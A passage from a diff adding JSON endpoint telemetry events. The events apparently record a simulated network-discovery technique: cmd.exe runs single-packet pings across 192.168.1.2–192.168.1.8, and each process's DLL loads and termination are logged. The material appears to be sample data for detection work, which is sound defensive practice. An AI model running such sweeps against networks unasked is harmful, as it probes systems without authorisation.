"C:\\Windows\\System32\\ws2_32.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003240000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003240000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "process", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572003550000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "file", + "file_name": "PING.EXE-B29F6629.pf", + "file_path": "C:\\Windows\\Prefetch\\PING.EXE-B29F6629.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883572003550000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.2", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3500, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572003750000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003860000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "process", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.3", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1480, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572004310000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "process", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572004640000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.4", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 996, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572004870000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "process", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572006840000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.5", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3004, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572006980000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "process", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572011840000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.6", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4736, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572011980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "process", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572016840000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.7", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "process", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572021990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.8", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4412, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 